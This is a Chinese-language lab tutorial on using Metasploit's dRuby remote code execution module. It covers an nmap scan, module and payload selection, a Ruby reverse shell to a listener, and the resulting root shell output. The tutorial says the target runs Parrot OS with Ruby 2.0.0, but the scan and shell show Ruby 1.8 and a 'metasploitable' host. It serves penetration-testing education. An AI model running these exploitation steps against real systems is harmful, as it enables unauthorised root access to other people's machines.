Metasploit对分布式Ruby进行远程代码执行
生活中,开发人员和用户每天都会有相似的操作习惯,这往往是黑客最容易利用对攻击目标与突破点。
我们在开发一款产品,每每都会在便利性和安全性之间进行权衡。
那么,在分布式Ruby的系统也会存在这样对现象,导致我们使用Metasploit就可以轻松地对其进行测试。
什么是分布式Ruby?
什么是分布式?单台计算机的计算能力不足、而又无法使用超级计算机的情况,
通过多台计算机的累加,把计算量和数据分布到每一台机器上,以达到超级计算机的效果。
分布式Ruby是Ruby编程语言的分布式对象系统,允许Ruby进程之间的远程方法调用。
虽然这项技术可以使用灵活的服务来增强某些程序,但如果没有正确实现,就会出现安全漏洞,
0x01 测试环境
这里演示,我们的攻击机和靶机都用的是ParrotSecurityOS,
IP:172.16.1.102
RubyVersion:ruby 2.0.0p648 (2015-12-16) [x86_64-linux]
0x02 验证漏洞
在我们的靶机上运行dRuby。在最初设置dRuby时,它会将自身绑定到特定的URI和端口,
我们今天演示端口为8787.以便我们可以正确被Nmap扫描。
使用nmap -sV ip -p 8787 来扫描目标主机和端口上运行的软件的版本并设置端口为8787
nmap -sV 172.16.1.102 -p 8787
[*] exec: nmap -sV 172.16.1.102 -p 8787
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-25 18:16 CST
Nmap scan report for 172.16.1.102
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds
我们可以看到dRuby服务存在并正在运行,接下来掏出我们metasploit漏洞利用
0x03 漏洞利用
终端键入msfconsole启动Metasploit ,然后search drb以显示任何匹配的结果。如下:
msf > search drb
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/linux/misc/drb_remote_codeexec 2011-03-23 excellent No Distributed Ruby Remote Code Execution
exploit/multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
exploit/multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
我们可以看到drb_remote_codeexec就是我们要找的,233。你可以使用use命令加载漏洞,然后在使用模块的路径。
msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(linux/misc/drb_remote_codeexec) > info
Name: Distributed Ruby Remote Code Execution
Module: exploit/linux/misc/drb_remote_codeexec
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-03-23
Provided by:
joernchen <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic
1 Trap
2 Eval
3 Syscall
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST no The target address
RPORT 8787 yes The target port
URI no The URI of the target host (druby://host:port) (overrides RHOST/RPORT)
Payload information:
Space: 32768
Description:
This module exploits remote code execution vulnerabilities in dRuby.
References:
CVE: Not available
http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/
http://bugkraut.de/posts/tainting
0x04启动漏洞利用
设置目标ip,端口
msf exploit(linux/misc/drb_remote_codeexec) > set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit(linux/misc/drb_remote_codeexec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
cmd/unix/generic normal No Unix Command, Generic Command Execution
cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
generic/custom normal No Custom Payload
generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
我们选择cmd/unix/reverse_ruby
msf exploit(linux/misc/drb_remote_codeexec) > set payload cmd/unix/reverse_ruby
payload => cmd/unix/reverse_ruby
msf exploit(linux/misc/drb_remote_codeexec) > options
Module options (exploit/linux/misc/drb_remote_codeexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.102 no The target address
RPORT 8787 yes The target port
URI no The URI of the target host (druby://host:port) (overrides RHOST/RPORT)
Payload options (cmd/unix/reverse_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
设置监听地址
msf exploit(linux/misc/drb_remote_codeexec) > set lhost 172.16.1.100
lhost => 172.16.1.100
0x05 获取Shell
直接run
msf exploit(linux/misc/drb_remote_codeexec) > run
[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Trying to exploit instance_eval method
[!] Target is not vulnerable to instance_eval method
[*] Trying to exploit syscall method
[*] attempting x86 execve of .JU4AK4Gh3sOBkaB7
[+] Deleted .JU4AK4Gh3sOBkaB7
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ip address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 08:00:27:77:62:6c brd ff:ff:ff:ff:ff:ff
inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
inet6 fe80::a00:27ff:fe77:626c/64 scope link
valid_lft forever preferred_lft forever